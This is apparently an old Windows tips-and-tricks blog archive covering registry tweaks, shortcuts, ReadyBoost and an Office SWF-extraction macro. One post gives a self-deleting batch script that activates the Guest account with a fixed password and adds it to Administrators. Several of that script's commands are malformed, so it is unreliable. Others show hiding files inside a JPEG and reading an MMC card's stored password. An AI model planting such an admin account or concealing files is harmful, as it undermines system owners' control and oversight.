Thursday, February 3, 2011
Send Emails Via Any Email Address
Read more »
Monday, July 5, 2010
Calculate Sunrise And Sunset With Google
Read more »
Monday, May 25, 2009
1 Click System Property On XP

Press
+Click On My ComputerFriday, February 6, 2009
Get Feed Updates On Your Mobile Via Sms

Use Google Sms Channel For Getting Feed Updates From Any Website Right Into Your Mobile Via Sms .
* For Enabling This Service Visit Google Sms Channel & Sign In With Your Google Account , & Register Your Mobile Number .

* After That Move On To The Create Your Own Channel , And Click Try now >>

* Give A Name & Description To Your SMS Channel , Select A Category In Which Your Site Belongs To , & Select Your Location
* Then On The Source Tab Select RSS/Atom Feed , And Give Your Feed Link
* On The Content Tab Select What Part Of The Post You Want To Receive (Recommended : Title)
* And Click On Create Channel
& You Have Done , Also Your Friends , & Others Can Also Join This Channel For Free
Note : Google's SMS Channel Is Currently Working Only In India
Monday, February 2, 2009
Edit Right Click Menu Items On XP
For Files, the secret lies in the "context menu handlers" under the shellex subkey for "All Files" which, in the registry, is nothing but an asterisk - like a dos wildcard, which means the values entered apply to all files. It is at the very top of the Root key, right here:
HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers
Click the the + sign next to the ContextMenuHandlers key, to expand it.
Now you will see some of the programs that have added items to your right-click menu. Simply delete the program keys you don't want.
Yup! It's that simple. If deleting makes you uneasy, just export the key before deleting it. Or, instead of deleting the values, disable them. Simply double click the default value for the program on the right hand pane and rename the clsid value by placing a period or dash in front of it.
ie; - {b5eedee0-c06e-11cf-8c56-444553540000}
Then exit the registry, refresh, and right click a file to see if the item was removed from the menu.
Some programs - like WinZip or WinRar - will add several items to your right click menu but all of them will be removed by deleting or disabling their one context menu handler.
Note that the above key only applies to the right click menu of files.
To remove entries from the right click context menu of folders, you need to navigate to the Folder and Drive keys:
HKEY_CLASSES_ROOT\Folder\shellex\ContextMenuHandlers
HKEY_CLASSES_ROOT\Drive\shellex\ContextMenuHandlers
All you have to do is follow the same procedure as for Files - either disable or delete items you wish to remove.
Adding Items
Adding Items to the right click menu of Files and Folders is also fairly simple using the Registry. It just involves the creation of a few new keys for each item you wish to add. You edit the same keys used for removing items. Let's use Notepad as an example of an item you'd like to add to the right click menu of all your files or folders.
For folders, go to this key:
HKEY_CLASSES_ROOT\Folder
Click the + sign next to Folder and expand it so that the Shell key is visible. Right click the Shell key and choose New>Key and name the key Notepad or whatever else you'd prefer (whatever the key is named is what will appear in the right-click menu). Now right click the new key you made and create another key named Command. Then, in the right hand pane, double click "Default" and enter Notepad.exe as the value.
Exit the registry, refresh, and right click any folder. Notepad should now be on the context menu.
For files, go here again:
HKEY_CLASSES_ROOT\*
Expand the * key and see if a Shell key exists. If it does exist, follow the same procedure as for folders. If it does not exist, you'll have to create a new Shell first. Just right click the * key and choose New>Key and name it Shell. Then right click the Shell key and continue on the same way you did for adding items to the right click menu of folders.
Once done, Notepad should appear as an option in the right click menu of all your files.
Sunday, January 25, 2009
Hide Files Inside A JPEG Image File

1. Gather the file you wish to bind, and the image file, and place them in a folder. For the sake of this demonstration,I will be using C:\New Folder
*The image will hereby be referred to in all examples as tricks.jpg
*The file will hereby be referred to in all examples as New Text Document.txt
2. Add the file/files you will be injecting into the image into a WinRar .rar or .zip. From here on this will be referred to as (secret.rar)
3. Open command prompt by going to Start > Run > cmd
4. In Command Prompt, navigate to the folder where your two files are by typingcd location [ex: cd C:\New Folder]
5. Type [copy /b tricks.jpg + secret.rar tricks.jpg] (remove the brackets)Congrats, as far as anyone viewing is concerned, this file looks like a JPEG, acts like a JPEG, and is a JPEG, yet it now contains your file.
In order to view/extract your file, there are two options that you can take
a) Change the file extension from tricks.jpg to tricks.rar, then open and your file is there.
b) Leave the file extension as is, right click, open with WinRar and your file is there
Friday, January 23, 2009
Make Your Guest Account Admin
* Create a notepad file , And copy the following code into it .
echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
* After that save the file as
* Then run the ""Guest2admin.bat" file .
The You Can Use Your Guest Accout With Administrator Privilages .
Thursday, January 22, 2009
Extract Flash(SWF) Files From Excel
This VBA Guide Has Been Tested In Office 2003 Professional & Office 2007,
- Open a new Microsoft Excel document,

*Copy the VBA program source code from Bottom and paste it onto the VBA source code editor,
*Press F5 to execute the VBA source code,
*An Open File dialog box prompts you to select the Office Excel document that embed the SWF
Flash animation file,A message box appears shortly after the Excel file is selected, with a
message that says where the extracted SWF Flash animation file is saved in local hard disk!
The extracted file will be of SWF type , It can be viewed using SWF OPENER Or With Your Browser , Firefox Or IE .
Sub ExtractFlash()
Dim tmpFileName As String
Dim FileNumber As Integer
Dim myFileId As Long
Dim MyFileLen As Long
Dim myIndex As Long
Dim swfFileLen As Long
Dim i As Long
Dim swfArr() As Byte
Dim myArr() As Byte
tmpFileName = Application.GetOpenFilename("MS Office File (*.doc;*.xls), *.doc;*.xls", , "Open MS Office file")
If tmpFileName = "False" Then Exit Sub
myFileId = FreeFile
Open tmpFileName For Binary As #myFileId
MyFileLen = LOF(myFileId)
ReDim myArr(MyFileLen - 1)
Get myFileId, , myArr()
Close myFileId
Application.ScreenUpdating = False
i = 0
Do While i < MyFileLen
If myArr(i) = &H46 Then
If myArr(i + 1) = &H57 And myArr(i + 2) = &H53 Then
swfFileLen = CLng(&H1000000) * myArr(i + 7) + CLng(&H10000) * myArr(i + 6) + CLng(&H100) * myArr(i + 5) + myArr(i + 4)
ReDim swfArr(swfFileLen - 1)
For myIndex = 0 To swfFileLen - 1
swfArr(myIndex) = myArr(i + myIndex)
Next myIndex
Exit Do
Else
i = i + 3
End If
Else
i = i + 1
End If
Loop
myFileId = FreeFile
tmpFileName = Left(tmpFileName, Len(tmpFileName) - 4) & ".swf"
Open tmpFileName For Binary As #myFileId
Put #myFileId, , swfArr
Close myFileId
MsgBox "Save the extracted SWF Flash as [ " & tmpFileName & " ]"
End Sub
___________________________________________________________
Monday, January 19, 2009
Rename Multiple Files In XP
For example, if you select the following files,
* notes.doc
* figures.xls
* disney.jpg
* holiday.gif
and rename the first file (notes.doc) to SoD.doc, XP renames the remaining files as follows:
* SoD (1).xls
* SoD (2).jpg
* SoD(3).gif
Icons Without Text

If you would like your desktop Icons to have no text underneath then try this tweak:
Right click the icon and select "Rename"
Now hold the "Alt" key and type "255" and hit Enter
NOTE : It may only work with the keypad numbers and not the number keys on top of the keyboard.
Sunday, January 18, 2009
One-Click Shutdown & Reboot Shortcuts
But you can do much more with a shutdown shortcut than merely shut down your PC. You can add any combination of several switches to do extra duty, like this:
shutdown -r -t 01 -c "Rebooting your PC"
Double-clicking on that shortcut will reboot your PC after a one-second delay and display the message "Rebooting your PC." The shutdown command includes a variety of switches you can use to customize it. Table 1-3 lists all of them and describes their use.
I use this technique to create two shutdown shortcuts on my desktop—one for turning off my PC, and one for rebooting. Here are the ones I use:
shutdown -s -t 03 -c "Bye Bye m8!"
shutdown -r -t 03 -c "Ill be back m8 ;)!"
Switch
What it does
-s
Shuts down the PC.
-l
Logs off the current user.
-t nn
Indicates the duration of delay, in seconds, before performing the action.
-c "messagetext"
Displays a message in the System Shutdown window. A maximum of 127 characters can be used. The message must be enclosed in quotation marks.
-f
Forces any running applications to shut down.
-r
Reboots the PC.
Saturday, January 17, 2009
Change The Default Location For Installing Softwares
XP uses the C:\Program Files directory as the default base directory into which new programs are installed. However, you can change the default installation drive and/ or directory by using a Registry hack.
Go to :-
- Start > Run
- Type “regedit” (without “” NOOBS!)
- Go to this directory…
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
- Look for the value named ProgramFilesDir. by default,this value will be C:\Program Files. Edit the value to any valid drive or folder and XP will use that new location as the default installation directory for new programs.
Capture Your Screen ( Manual )
You Can Capture Your Computer Screen Without Any Software Like Screen Hunter Or Any Thing Else :
You May Be Noticed About A Key In Your KeyBoard Which Labeled "Print Screen" .
We Can Use This Key To Capture The Screen .
For Capturing The Screen Just Press "Print Screen" Button ,
Then Open Any Image Editing Softwares Like "M/S Paint" Then Press Ctrl+V .
You Are Done.
Friday, January 16, 2009
Watch High Quality And Low Quality Videos On Youtube
If Yes ! Then Try This Tricks ...
I Will Give An Example ,
This is the original link go ahead and click to see the low quality.
http://in.youtube.com/watch?v=i5d-jBS828c
This is the high quality link made by adding &fmt=18 to the end of the URL.
http://in.youtube.com/watch?v=i5d-jBS828c&fmt=18
Try It ....
Thursday, January 15, 2009
Use Your Pendrive As Ram ( Vista )
You can not only use your Pen drive but also any types of memory cards or memory sticks that you got with your mobile phones, digital cameras or any other devices.
This option of making the external memory device works as RAM is called ‘ReadyBoost’.
Caution: - The device can only be used with ReadyBoost if it qualifies the data transfer speed test; means if the data transfer speed of the device is lower than that is recommended by Readyboost, then it cannot be used as RAM.
It is written in the product description of some of the Pen Drives that whether the particular pen drive is compatible with Readyboost or not. So you can check it before buying one.
Benefits of ReadyBoost :-
- If your system has low RAM, resulting a slowdown in the performance, Readyboost will work for you.
- RAM is much more costlier than Pen drives and user can save money by increasing the RAM capacity with these USB drives (You should have minimum 512 MB RAM to run Windows Vista).
- User can assign desired space to Readyboost. It's not that you have to give the full memory of your pen drive to Readyboost. You can assign the memory space manually and use the rest of the space as it is.
How to make your flash drive work as RAM :-
Insert Your Pen drive or Memory stick -> Right click on the drive that appears in My Computer -> Go to its properties -> click on 'Readyboost' Tab
If the Windows accepts your drive to work as "Readyboost" then the menu will look like this :-

And if your Pen drive's speed is not sufficient, then this menu will show a message, telling you that your pen drive's data transfer speed is less; hence, it can't work with Readyboost.
There is also a shortcut to do this. When you insert your pen drive, you will see Readyboost option in the "AutoPlay" menu. You can activate it from here also.
Best KeyBoard ShortCuts
Windows key + R = Run menu
This is usually followed by:
cmd = Command Prompt
iexplore + "web address" = Internet Explorer
compmgmt.msc = Computer Management
dhcpmgmt.msc = DHCP Management
dnsmgmt.msc = DNS Management
services.msc = Services
eventvwr = Event Viewer
dsa.msc = Active Directory Users and Computers
dssite.msc = Active Directory Sites and Services
Windows key + E = Explorer
ALT + Tab = Switch between windows
ALT, Space, X = Maximize window
CTRL + Shift + Esc = Task Manager
Windows key + Break = System properties
Windows key + F = Search
Windows key + D = Hide/Display all windows
CTRL + C = copy
CTRL + X = cut
CTRL + V = paste
Also don't forget about the "Right-click" key next to the right Windows key on your keyboard. Using the arrows and that key can get just about anything done once you've opened up any program.
Keyboard Shortcuts
[Alt] and [Esc] Switch between running applications
[Alt] and letter Select menu item by underlined letter
[Ctrl] and [Esc] Open Program Menu
[Ctrl] and [F4] Close active document or group windows (does not work with some applications)
[Alt] and [F4] Quit active application or close current window
[Alt] and [-] Open Control menu for active document
Ctrl] Lft., Rt. arrow Move cursor forward or back one word
Ctrl] Up, Down arrow Move cursor forward or back one paragraph
[F1] Open Help for active application
Windows+M Minimize all open windows
Shift+Windows+M Undo minimize all open windows
Windows+F1 Open Windows Help
Windows+Tab Cycle through the Taskbar buttons
Windows+Break Open the System Properties dialog box
acessability shortcuts
Right SHIFT for eight seconds........ Switch FilterKeys on and off.
Left ALT +left SHIFT +PRINT SCREEN....... Switch High Contrast on and off.
Left ALT +left SHIFT +NUM LOCK....... Switch MouseKeys on and off.
SHIFT....... five times Switch StickyKeys on and off.
NUM LOCK...... for five seconds Switch ToggleKeys on and off.
explorer shortcuts
END....... Display the bottom of the active window.
HOME....... Display the top of the active window.
NUM LOCK+ASTERISK....... on numeric keypad (*) Display all subfolders under the selected folder.
NUM LOCK+PLUS SIGN....... on numeric keypad (+) Display the contents of the selected folder.
NUM LOCK+MINUS SIGN....... on numeric keypad (-) Collapse the selected folder.
LEFT ARROW...... Collapse current selection if it's expanded, or select parent folder.
RIGHT ARROW....... Display current selection if it's collapsed, or select first subfolder.
Type the following commands in your Run Box (Windows Key + R) or Start Run
devmgmt.msc = Device Manager
msinfo32 = System Information
cleanmgr = Disk Cleanup
ntbackup = Backup or Restore Wizard (Windows Backup Utility)
mmc = Microsoft Management Console
excel = Microsoft Excel (If Installed)
msaccess = Microsoft Access (If Installed)
powerpnt = Microsoft PowerPoint (If Installed)
winword = Microsoft Word (If Installed)
frontpg = Microsoft FrontPage (If Installed)
notepad = Notepad
wordpad = WordPad
calc = Calculator
msmsgs = Windows Messenger
mspaint = Microsoft Paint
wmplayer = Windows Media Player
rstrui = System Restore
netscp6 = Netscape 6.x
netscp = Netscape 7.x
netscape = Netscape 4.x
waol = America Online
control = Opens the Control Panel
control printers = Opens the Printers Dialog
internetbrowser
type in u're adress "google", then press [Right CTRL] and [Enter]
add www. and .com to word and go to it
For Windows XP:
Copy. CTRL+C
Cut. CTRL+X
Paste. CTRL+V
Undo. CTRL+Z
Delete. DELETE
Delete selected item permanently without placing the item in the Recycle Bin. SHIFT+DELETE
Copy selected item. CTRL while dragging an item
Create shortcut to selected item. CTRL+SHIFT while dragging an item
Rename selected item. F2
Move the insertion point to the beginning of the next word. CTRL+RIGHT ARROW
Move the insertion point to the beginning of the previous word. CTRL+LEFT ARROW
Move the insertion point to the beginning of the next paragraph. CTRL+DOWN ARROW
Move the insertion point to the beginning of the previous paragraph. CTRL+UP ARROW
Highlight a block of text. CTRL+SHIFT with any of the arrow keys
Select more than one item in a window or on the desktop, or select text within a document. SHIFT with any of the arrow keys
Select all. CTRL+A
Search for a file or folder. F3
View properties for the selected item. ALT+ENTER
Close the active item, or quit the active program. ALT+F4
Opens the shortcut menu for the active window. ALT+SPACEBAR
Close the active document in programs that allow you to have multiple documents open simultaneously. CTRL+F4
Switch between open items. ALT+TAB
Cycle through items in the order they were opened. ALT+ESC
Cycle through screen elements in a window or on the desktop. F6
Display the Address bar list in My Computer or Windows Explorer. F4
Display the shortcut menu for the selected item. SHIFT+F10
Display the System menu for the active window. ALT+SPACEBAR
Display the Start menu. CTRL+ESC
Display the corresponding menu. ALT+Underlined letter in a menu name
Carry out the corresponding command. Underlined letter in a command name on an open menu
Activate the menu bar in the active program. F10
Open the next menu to the right, or open a submenu. RIGHT ARROW
Open the next menu to the left, or close a submenu. LEFT ARROW
Refresh the active window. F5
View the folder one level up in My Computer or Windows Explorer. BACKSPACE
Cancel the current task. ESC
SHIFT when you insert a CD into the CD-ROM drive Prevent the CD from automatically playing.
Use these keyboard shortcuts for dialog boxes:
To Press
Move forward through tabs. CTRL+TAB
Move backward through tabs. CTRL+SHIFT+TAB
Move forward through options. TAB
Move backward through options. SHIFT+TAB
Carry out the corresponding command or select the corresponding option. ALT+Underlined letter
Carry out the command for the active option or button. ENTER
Select or clear the check box if the active option is a check box. SPACEBAR
Select a button if the active option is a group of option buttons. Arrow keys
Display Help. F1
Display the items in the active list. F4
Open a folder one level up if a folder is selected in the Save As or Open dialog box. BACKSPACE
If you have a Microsoft Natural Keyboard, or any other compatible keyboard that includes the Windows logo key and the Application key , you can use these keyboard shortcuts:
Display or hide the Start menu. WIN Key
Display the System Properties dialog box. WIN Key+BREAK
Show the desktop. WIN Key+D
Minimize all windows. WIN Key+M
Restores minimized windows. WIN Key+Shift+M
Open My Computer. WIN Key+E
Search for a file or folder. WIN Key+F
Search for computers. CTRL+WIN Key+F
Display Windows Help. WIN Key+F1
Lock your computer if you are connected to a network domain, or switch users if you are not connected to a network domain. WIN Key+ L
Open the Run dialog box. WIN Key+R
Open Utility Manager. WIN Key+U
accessibility keyboard shortcuts:
Switch FilterKeys on and off. Right SHIFT for eight seconds
Switch High Contrast on and off. Left ALT+left SHIFT+PRINT SCREEN
Switch MouseKeys on and off. Left ALT +left SHIFT +NUM LOCK
Switch StickyKeys on and off. SHIFT five times
Switch ToggleKeys on and off. NUM LOCK for five seconds
Open Utility Manager. WIN Key+U
shortcuts you can use with Windows Explorer:
Display the bottom of the active window. END
Display the top of the active window. HOME
Display all subfolders under the selected folder. NUM LOCK+ASTERISK on numeric keypad (*)
Display the contents of the selected folder. NUM LOCK+PLUS SIGN on numeric keypad (+)
Collapse the selected folder. NUM LOCK+MINUS SIGN on numeric keypad (-)
Collapse current selection if it's expanded, or select parent folder. LEFT ARROW
Display current selection if it's collapsed, or select first subfolder. RIGHT ARROW
Use Your Pendrive As Ram ( XP )
1) Connect your pen drive to your PC [pen drive should be at least 1 GB or if you having 4 GB then its better]
2) Allow PC to detect your pen drive.
3) After your PC finished with its detection work,you have to do some little works .
4) Right click on the My Computer and select the properties :
5) Go to advanced and then performance setting then advanced :

6) Then select pen drive and click on custom size " Check the value of space available "
7) Enter the same in the Initial and the Max columns :

" You just used the memory of the Pen Drive as a Virtual Memory "
8) Now restart your pc and enjoy your fast and super system
Unlock Your MMC Card
Need help unlocking MMC card
The instructions for getting the password are:
1: Use any efile manager like SELEQ 1.65
2: Open SELEQ 1.65 and go to Root C:
3: Options and FIND, write MMCSTORE press OK
4: Send this file by Bluetooth or Infrared to your PC
5: Rename the file MMCSTORE to MMCSTORE.TXT
6: Open the file and the password off the MMC are there
Again, I would be extremely grateful if someone was willing to do this favor for me, and really don't want to have to buy a new MMC card (or lose my data on the card).
Thank you


